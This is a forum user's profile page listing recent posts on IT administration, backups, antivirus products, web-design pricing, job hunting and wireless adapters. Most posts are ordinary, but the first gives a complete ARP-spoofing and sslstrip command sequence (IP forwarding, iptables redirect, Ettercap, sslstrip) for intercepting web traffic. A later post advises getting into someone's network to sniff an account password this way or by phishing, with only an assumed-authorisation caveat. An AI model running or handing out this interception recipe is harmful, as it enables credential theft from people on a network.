Jump to content

nykon

Active Members
  • Posts

    14
  • Joined

  • Last visited

Contact Methods

  • Website URL
    http://www.offensive-security.com
  • ICQ
    0

Profile Information

  • Gender
    Male
  • Location
    New Zealand
  • Interests
    Information security, urbex, dance music/parties, photography, urbex.

Recent Profile Visitors

2,254 profile views

nykon's Achievements

Newbie

Newbie (1/14)

  1. Flip your box into forwarding mode: echo "1" > /proc/sys/net/ipv4/ip_forward Setup iptables to redirect HTTP traffic to sslstrip: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort> Launch Ettercap: ettercap -i <interface> -TqM ARP:REMOTE // // Run sslstrip: sslstrip -a -l <listenPort> Sorted.
  2. Wooo how come you are here ?

  3. Have a good read through the job description/listing, and what they are looking for - and use this to help structure a letter that shows them what you can offer them, and how you can fulfil their requirements. If you do this, you won't come across so big-headed. You can say that you have every industry relevant qualification under the sun, and that you can hack the gibson; but how would those skills help you master that position? Just food for thought. From experience, as a graduate you should take every oppurtunity to build your contact base and maintain those relationships. Attend presentations and society meetings etc, ask around friends and family, and don't be afraid to walk in to offices and ask to speak to someone who can help you. It's a simple case of having nothing to lose by trying :). All you really need is a foot in the door, so take what job you can, get some base experience, and the world is your oyster. Edit: woops, wasn't meant to be a reply to Wetwork.
  4. Contact your ISP and get them to blacklist his IP. Then reset your router to its factory state and start fresh with settings, including networking settings on your computers.
  5. Where are you from

  6. I deal with a variety of HP and IBM tape units, using both Arcserve and Arkeia as a backup solution. Most of our clients in fact demand tape backups to be taken. Online or offline dsk>disk backups are done of each environment after each business day and stored on a dedicated backup volume, before being put to tape overnight. Next day the tapes go off to a secure facility to be held, and brought back at a later date as part of a 2 week rotation. We also employ the common policy of archiving monthly, quarterly and bi-annual tapes for selected clients. Disk backups are also taken pre and post to environment upgrades, often set aside for some set period of time should disk space allow it etc... so in the case of a catastrophic failure you can restore much faster than a tape, and not have to pay the extortionate fee of having the tape couriered back on-demand from the off-site location. So, essentially you end up with a good amout of redundancy between having the D2D backup on the SAN and the tape backup that is archived.
  7. Here we have Trend OfficeScan on all servers. The benchmarking team have noticed minimal impact on server performance. Deployment is extremely straight forward. Just like any product update though, I would highly advise testing product updates for some time in a test environment prior to installation on production - as a couple of times in the past year we have had Trend libraries crash.
  8. A better tactic would be to gain access to the computer/network of the person using the account (who I am assuming is yourself or someone who has authorised you to do so) and use SSLStrip to sniff out the password. Or use phishing.
  9. It might be just me, but it doesn't quite seem fitting for a web designer to be asking for someone to design them a banner. When it comes down to the crunch of actually designing a site for a customer, and they have very specific requirements, you can't afford to be outsourcing design or relying on freebies from forum communities. Both time and money won't permit. Especially for something as simple as a banner. I mean, if you can't do that then you obviously aren't ready to be doing it commercially ;). There are much harder things than a banner...
  10. Nice start! :) However, if you are advertising yourself as a "web design" company, one would expect more design thought put into it. It needs to appeal a lot more visually, more graphics and some form of animation to make it feel less static. Things such as inconsistent usage of fonts, unbalanced/glitchy top menu, and junky page footer aren't a good start. The logo needs to feel a bit more integrated too. Just keep in mind that your site is essentially a representation of what you are capable of, extremely important if you are starting out and have no reputation. Also, don't give fixed costs for your services, charge per hour (ie: rates for consultation, general work, and ongoing maintanance). Don't be afraid to be cheeky with your rates. If you charge too low: 1) you aren't making the most of your time. 2) you may give a false impression of your ability, and people may think you are an amateur (even if you are). etc.. But then again, don't charge too much. If you do start low, and decide to raise your costs, existing clients may get put off and terminate their contracts. From experience, most importantly, giving fixed costs doesn't take into account that 90% of the time clients want to make changes during development. You are left doing extra work for nothing. When I started out freelance I charged about US$50 p/h, and people had no issue with that. Start off with a consultation, get an idea of what they want, give them a quote and contract to sign - and go from there.
  11. Yes, my name is a reference to the cult movie "Hackers" :P. Favourite game: Assassins Creed series. Favourite OS: Backtrack 4 Final Favourite console: PS3 Age: 22 Favourite band: Chrono & Demon-Dwarf (hardcore electronica) Favourite book: Gangster by Lorenzo Carcaterra Favourite movie: V for Vendetta Favourite director: Quentin Tarantino Favourite TV Show: The Unit Other hobbies: Urbex, photography, raving & dance music. Occupation: First-level system-admin/operations consultant for a multi-national software and solutions company, based here in NZ. Company develops software and maintains systems for banks, ports, hospitals, railways, etc. Currently working through my MCITP:EA exams.
  12. You need to use something like File Shredder, where it removes the data from the disk and places some other data in its place on the platter so that it cannot be recovered (at least that is how I am lead to believe it works).
  13. If you have relatively well spec'd workstations then Trend Officescan is an effective solution. It is extremely easy to deploy, straight-forward to manage in a domain environment, and keeps well updated. On this Vista Enterprise laptop here the real-time agent is using only 3,2xx kb of memory - so it is not as much of a resource hog as the retail/home distros. Although, in a smaller environment where perhaps there is no dedicated network based protection systems, such as an IPS/IDS, I am not sure how it would fair. But from my experience it is fine, and it is protecting production banking/government/hospital systems etc. Only gripe is have had a few product updates that have caused massive system instability in a couple of cases, and have had to either patch or roll back... At home am using Vypre/NOD32 and have no issues with either :) in comparison with Norton 360 and AVG.
  14. There will be no issue with the laptop/adapter combination, so long as your laptop supports USB :P. The Realtek 8187B chipset of the Alfa is natively supported in both BT3 and BT4, so it is a matter of plugging it in before power-on and it will be loaded on boot. As far as I am aware there are no better alternatives to either the 1W or 500mW models of the Alfa. Just bring up an ifconfig when using it, as I have found that BT tends to chop and change with what device ID it assigns to it. Sometimes both my internal and USB adapter get loaded, sometimes only the Alfa. Something to keep in mind if you are using scripting where you may hard-code the device ID.
×
×
  • Create New...